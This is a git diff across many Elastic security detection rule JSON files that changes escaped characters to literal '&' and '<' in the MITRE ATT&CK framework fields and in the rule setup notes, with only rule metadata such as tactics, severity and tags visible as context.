+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json
index 0bd521c02c7..f71b06c5d0d 100644
--- a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json
index 14402323384..91f75fc4d73 100644
--- a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_102.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json
index b1772abcc21..c3ac4088bb8 100644
--- a/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c28c4d8c-f014-40ef-88b6-79a1d67cd499_103.json
@@ -38,7 +38,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json
index 5a4ac086733..6771f995f1d 100644
--- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_102.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json
index dd881405ea3..e798d0205d4 100644
--- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_103.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json
index 9720a19d461..a562437cba9 100644
--- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_104.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json
index 1fe1b30b8cd..f8bf6ce1661 100644
--- a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_105.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json
index 65d268c2321..75c640566d9 100644
--- a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json
index b695d4c62d6..09cb2e56454 100644
--- a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json
index 7db3e60f0bc..045c219a1aa 100644
--- a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json
index e59fa1b801c..d1bb7e85a21 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json
index 7e89d20e9d5..a02044d20f2 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json
index 8cbe4e599a1..868509b1344 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json
index 7d3add39f53..5a1b39dc8a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json
index d6e7d0405fa..cc39ee043fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json
index 04b2488fbad..a6e34aba7e2 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json
index fa272229e09..d45e2929e48 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json
index a5ff997c327..5806a984cd9 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json
index e88f4786662..93c18d2aeaf 100644
--- a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json
index ac7a148a9da..46c790e690b 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -117,7 +117,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json
index bd2a6e27387..2622397a402 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -116,7 +116,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json
index fa9eb57e27b..0bd31183d11 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -117,7 +117,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json
index 94180aedf56..94241206f8f 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -116,7 +116,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json
index bbea1f7c254..e7fe20b46d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json
index 8ee83c7e03a..c2250477cc9 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json
index 30e5021bcb9..18182880123 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json
index f079e38500a..c812300ed8d 100644
--- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
